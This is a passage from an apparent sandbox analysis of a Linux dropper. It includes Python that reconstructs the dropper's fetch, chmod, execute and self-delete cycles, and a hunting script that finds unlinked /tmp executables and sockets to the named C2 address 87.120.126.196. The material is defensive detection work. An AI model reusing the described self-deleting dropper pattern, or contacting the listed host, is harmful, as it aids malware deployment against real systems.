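        m = URL_RE.search(cmdline)
        return ("fetch", m.group(0).rsplit("/", 1)[-1]) if m else (None, None)
    if tool in ("chmod", "rm") and len(parts) >= 2:
        return tool, parts[-1]
    if tool.startswith("./"):
        return "exec", tool[2:]
    return None, None


def build_chains(events):
    """Group events, in PID order, into one chain per fetch-to-rm cycle of a payload."""
    chains, current = [], None
    for pid, _image, cmdline, _sigs in sorted(events):
        stage, name = classify(cmdline)
        if stage is None:
            continue
        if stage == "fetch":
            # A fetch opens a new cycle unless it is another fetcher for the same,
            # still-open payload (the script tries wget, curl and busybox in turn).
            if current is None or current["name"] != name or "rm" in current["stages"]:
                current = {"name": name, "stages": defaultdict(list), "urls": set()}
                chains.append(current)
            current["urls"].add(URL_RE.search(cmdline).group(0))
        elif current is None or current["name"] != name:
            continue  # e.g. "rm bins.sh": not tied to any fetched payload
        current["stages"][stage].append(pid)
    return chains


def summarize(chains):
    """Hosts contacted, payloads that ran, fetches that never ran, and cycles that
    completed the full fetch -> chmod -> exec -> rm (self-deleting) pattern."""
    full = ("fetch", "chmod", "exec", "rm")
    return {
        "hosts": sorted({urlparse(u).netloc for c in chains for u in c["urls"]}),
        "executed": [c["name"] for c in chains if "exec" in c["stages"]],
        "incomplete": [c["name"] for c in chains if "exec" not in c["stages"]],
        "self_deleting": [c["name"] for c in chains if all(s in c["stages"] for s in full)],
    }


def signature_attribution(events):
    """Which process images raised each signature: separates hits from stock
    tools such as curl from hits raised by the dropped payloads themselves."""
    by_sig = defaultdict(set)
    for _pid, image, _cmdline, sigs in events:
        for sig in sigs:
            by_sig[sig].add(image)
    return {sig: sorted(images) for sig, images in by_sig.items()}


if __name__ == "__main__":
    print(summarize(build_chains(EVENTS)))
    print(signature_attribution(EVENTS))
```

On the subset above the summary reports a single host, 87.120.126.196, two executed and self-deleting payloads, and one incomplete cycle for the trailing wget; the attribution map shows "Checks CPU configuration" raised only by /usr/bin/curl, which is the point to keep in mind when reading the sandbox-evasion mapping in the ATT&CK section.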
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
  File and Directory Permissions Modification (1)
    Linux and Mac File and Directory Permissions Modification (1)
  Virtualization/Sandbox Evasion (1)
    System Checks (1)
Downloads
-
Filesize: 153B
MD5: 998368d7c95ea4293237f2320546e440
SHA1: 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256: 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512: 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97
Only one distinct download is recorded, and at 153 bytes it is far too small to be an ELF bot binary. Treat these hashes as identifying whatever the server at 87.120.126.196 returned at analysis time (likely an error or placeholder response) rather than a payload; the "dropped EXE" executions above would then have run this content, not a working bot.
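Because the script removes every payload right after starting it (the rm step of each cycle in the process tree), the /tmp file names in the "Writes file to tmp directory" signature are poor host indicators on their own: by the time anyone looks, the files are gone. What survives is the running process, whose /proc/<pid>/exe link then reads "/tmp/<name> (deleted)", and any open socket to the download host, which /proc/net/tcp lists as a hex address in host byte order. The script below is an added example, not part of the sandbox report: it checks both on a live Linux host. `proc_root` is a parameter so the same functions run against a constructed /proc snapshot (built by build_fake_proc, with PIDs and the payload name taken from the report; not captured from a real machine) and against the real /proc. Running it on an unprivileged account only sees that account's processes; on a big-endian target such as the mipsbe image in this report, the kernel prints addresses big-endian, which hex_addr handles through its byteorder argument.

```python
"""Hunt on a live Linux host for what this dropper leaves behind.

Added example; not part of the sandbox report. build_fake_proc() creates a
constructed /proc snapshot for offline testing; the real /proc is the default.
"""
import ipaddress
import os
import sys
import tempfile

C2_HOST = "87.120.126.196"          # download host from the report
DELETED = " (deleted)"              # suffix the kernel appends when the image was unlinked


def hex_addr(ip, byteorder=sys.byteorder):
    """Encode a dotted IPv4 address the way /proc/net/tcp prints it (host byte order)."""
    packed = ipaddress.IPv4Address(ip).packed
    return (packed[::-1] if byteorder == "little" else packed).hex().upper()


def deleted_tmp_executables(proc_root="/proc"):
    """(pid, original path) for processes whose image was a /tmp file that is now unlinked."""
    hits = []
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        try:
            exe = os.readlink(os.path.join(proc_root, entry, "exe"))
        except OSError:             # kernel thread, already exited, or another user's process
            continue
        if exe.startswith("/tmp/") and exe.endswith(DELETED):
            hits.append((int(entry), exe[:-len(DELETED)]))
    return sorted(hits)


def connections_to(ip, proc_root="/proc", byteorder=sys.byteorder):
    """(remote port, state code) for every TCP socket whose peer is `ip`."""
    want = hex_addr(ip, byteorder)
    found = []
    with open(os.path.join(proc_root, "net", "tcp")) as fh:
        next(fh)                    # column header
        for line in fh:
            fields = line.split()
            rem_ip, rem_port = fields[2].split(":")
            if rem_ip == want:
                found.append((int(rem_port, 16), fields[3]))
    return found


def build_fake_proc():
    """Constructed /proc snapshot for offline testing (little-endian address layout)."""
    root = tempfile.mkdtemp(prefix="fakeproc-")
    os.makedirs(os.path.join(root, "net"))
    for pid, target in ((1, "/sbin/init"),
                        (820, "/tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67" + DELETED),
                        (846, "/tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67" + DELETED)):
        os.makedirs(os.path.join(root, str(pid)))
        os.symlink(target, os.path.join(root, str(pid), "exe"))
    # st 0A = LISTEN, 01 = ESTABLISHED; the second row is an HTTP connection to the C2 host
    rows = [
        "  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode",
        "   0: 0100007F:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1 0",
        "   1: 0F02000A:B2C4 " + hex_addr(C2_HOST, "little")
        + ":0050 01 00000000:00000000 00:00000000 00000000  1000        0 2 0",
    ]
    with open(os.path.join(root, "net", "tcp"), "w") as fh:
        fh.write("\n".join(rows) + "\n")
    return root


if __name__ == "__main__":
    print("unlinked /tmp executables:", deleted_tmp_executables())
    print("TCP sockets to %s:" % C2_HOST, connections_to(C2_HOST))
```

A hit from deleted_tmp_executables is worth acting on even when the name is not one of the 14 in this report: the payload names are per-campaign, but running an unlinked executable out of /tmp is the behaviour that matters. Capture /proc/<pid>/exe (readable as a file while the process lives) before killing the process, since that is the only remaining copy of the binary.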